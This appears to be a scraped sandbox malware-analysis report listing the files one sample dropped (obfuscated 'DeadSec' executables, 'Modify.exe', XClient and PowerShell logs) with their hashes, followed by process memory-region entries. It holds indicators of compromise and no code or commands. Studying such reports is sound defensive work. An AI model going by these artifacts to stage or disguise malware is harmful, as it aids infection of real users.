                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                    MD5

                                                                                                                    22d120454dd38d7f1a3f1cd0eb497f95

                                                                                                                    SHA1

                                                                                                                    4c11a082bf8e64b21310b959821a9f7324aa8107

                                                                                                                    SHA256

                                                                                                                    6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

                                                                                                                    SHA512

                                                                                                                    1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

                                                                                                                    Filesize

                                                                                                                    654B

                                                                                                                    MD5

                                                                                                                    2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                    SHA1

                                                                                                                    684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                    SHA256

                                                                                                                    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                    SHA512

                                                                                                                    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                    SHA1

                                                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                    SHA256

                                                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                    SHA512

                                                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    276798eeb29a49dc6e199768bc9c2e71

                                                                                                                    SHA1

                                                                                                                    5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                                                    SHA256

                                                                                                                    cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                                                    SHA512

                                                                                                                    0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    77fad1dec6867fb7dd395c25c46d8ae5

                                                                                                                    SHA1

                                                                                                                    abfecfd6c63bb35ec88d98ef210adefc139d793e

                                                                                                                    SHA256

                                                                                                                    02b0ab469998ac630b421de245ee243599422e7f2c2f9714085fc5b837891784

                                                                                                                    SHA512

                                                                                                                    ac8d9d660992d076e46ffdb7422d4916789a7ca2f5737c711449f518745dee197ed1c08e50f81f92cb7d2d1ea94fe024e77a8295e1be05c5a49a0fd7495776d3

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    944B

                                                                                                                    MD5

                                                                                                                    9fe98fc0c9a0722db4c32cf9aefd31c1

                                                                                                                    SHA1

                                                                                                                    8acba0403355289fa4843771a72dbabf67838132

                                                                                                                    SHA256

                                                                                                                    de95e5cdd7d4e3bb5439a74b121962c00a94498fb6df03fae7e775b0715421d0

                                                                                                                    SHA512

                                                                                                                    b4a2f5de2646808d2763f6316cb0af4096594f410ee1b67e73f157cea21741007868d3362bc5b7dea5b40410e0496ed1144dacf55385cb6569653096dc5faf7e

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    944B

                                                                                                                    MD5

                                                                                                                    34f595487e6bfd1d11c7de88ee50356a

                                                                                                                    SHA1

                                                                                                                    4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                                                                    SHA256

                                                                                                                    0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                                                                    SHA512

                                                                                                                    10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    944B

                                                                                                                    MD5

                                                                                                                    dbb904188a321994906abe152659c567

                                                                                                                    SHA1

                                                                                                                    1a131923372bab101ca002c35544858fe3e2370c

                                                                                                                    SHA256

                                                                                                                    ccd43cc5dbdd2dc786bdd89460c11ea5f55b4e8389b98e0bcd6400f614fe9d04

                                                                                                                    SHA512

                                                                                                                    37cbba09369d94ce3d9852503c50a1cdc14a5646d8b4fdeca9bffd3d9284d8e0ceb2801ba458fdddf762f1a4058c5781d0a2f95452d3f7302e42abc5920238ef

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    944B

                                                                                                                    MD5

                                                                                                                    0b76b616fb826c97e65bef9827b2c11c

                                                                                                                    SHA1

                                                                                                                    e602d8bd371e86e288ad84d4838e291c471d59b3

                                                                                                                    SHA256

                                                                                                                    254501f64defe7d6e226972045f7e5eb5184ce89f07d96ea7d134b15988196dd

                                                                                                                    SHA512

                                                                                                                    9002da9a15dbc7b72904bb4bd0473a02370105e90593bf9d39367b8514ec7c6ec94b8d1111fbb9aa8b562a4d0ba67f43208c54382a32c4251e4d4ff7758b6736

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    944B

                                                                                                                    MD5

                                                                                                                    6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                                                    SHA1

                                                                                                                    c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                                                    SHA256

                                                                                                                    2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                                                    SHA512

                                                                                                                    60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    944B

                                                                                                                    MD5

                                                                                                                    ef647504cf229a16d02de14a16241b90

                                                                                                                    SHA1

                                                                                                                    81480caca469857eb93c75d494828b81e124fda0

                                                                                                                    SHA256

                                                                                                                    47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

                                                                                                                    SHA512

                                                                                                                    a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Filesize

                                                                                                                    948B

                                                                                                                    MD5

                                                                                                                    2af06a6b36db9473e4a7d9c7ab72b70b

                                                                                                                    SHA1

                                                                                                                    8ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645

                                                                                                                    SHA256

                                                                                                                    18a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158

                                                                                                                    SHA512

                                                                                                                    3495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Modify.exe

                                                                                                                    Filesize

                                                                                                                    229KB

                                                                                                                    MD5

                                                                                                                    9259d8aef8f52e8ff4fa082c0074c9b0

                                                                                                                    SHA1

                                                                                                                    88abb68a5632812be3c18e0c740e3818d9501b3e

                                                                                                                    SHA256

                                                                                                                    45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db

                                                                                                                    SHA512

                                                                                                                    9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hwgw02e5.r4j.ps1

                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

                                                                                                                    Filesize

                                                                                                                    42KB

                                                                                                                    MD5

                                                                                                                    737b2d60dc5d475685b65f5c288e00c0

                                                                                                                    SHA1

                                                                                                                    144ba7647d8609abe4aab74d4f191e2c594dd55a

                                                                                                                    SHA256

                                                                                                                    69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084

                                                                                                                    SHA512

                                                                                                                    96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

                                                                                                                  • memory/384-243-0x000001F88F5A0000-0x000001F88F5CC000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/384-244-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/384-237-0x000001F88F5A0000-0x000001F88F5CC000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/616-210-0x000002754E040000-0x000002754E06C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/616-211-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/616-204-0x000002754E040000-0x000002754E06C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/616-203-0x000002754E040000-0x000002754E06C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/616-202-0x000002754E010000-0x000002754E036000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    152KB

                                                                                                                  • memory/672-221-0x00000288F9B60000-0x00000288F9B8C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/672-215-0x00000288F9B60000-0x00000288F9B8C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/672-222-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/720-248-0x00000252857D0000-0x00000252857FC000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/960-232-0x000001DA13DA0000-0x000001DA13DCC000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/960-226-0x000001DA13DA0000-0x000001DA13DCC000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    176KB

                                                                                                                  • memory/960-233-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1912-187-0x00007FFA925F0000-0x00007FFA927E5000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/1912-188-0x00007FFA924F0000-0x00007FFA925AE000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                  • memory/1912-186-0x0000023C31520000-0x0000023C3154A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    168KB

                                                                                                                  • memory/1980-127-0x000001FB2F240000-0x000001FB2F252000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/1980-876-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/1980-29-0x000001FB2EC90000-0x000001FB2ECD0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    256KB

                                                                                                                  • memory/1980-30-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/1980-78-0x000001FB49320000-0x000001FB49396000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/1980-79-0x000001FB2F1D0000-0x000001FB2F220000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    320KB

                                                                                                                  • memory/1980-80-0x000001FB2F160000-0x000001FB2F17E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    120KB

                                                                                                                  • memory/1980-126-0x000001FB2F1A0000-0x000001FB2F1AA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/2656-199-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/2656-191-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/2656-192-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/2656-189-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/2656-190-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/2656-197-0x00007FFA925F0000-0x00007FFA927E5000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/2656-198-0x00007FFA924F0000-0x00007FFA925AE000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                  • memory/2656-196-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3180-1041-0x00000000006B0000-0x00000000006C0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/4056-25-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4056-19-0x0000000000830000-0x0000000000840000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/4056-103-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4056-877-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4376-0-0x00007FFA745E3000-0x00007FFA745E5000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4376-4-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4376-65-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4376-1-0x0000000000C40000-0x0000000000C8A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    296KB

                                                                                                                  • memory/4724-37-0x0000024C45510000-0x0000024C45532000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/4900-917-0x0000000000EC0000-0x0000000000ED0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB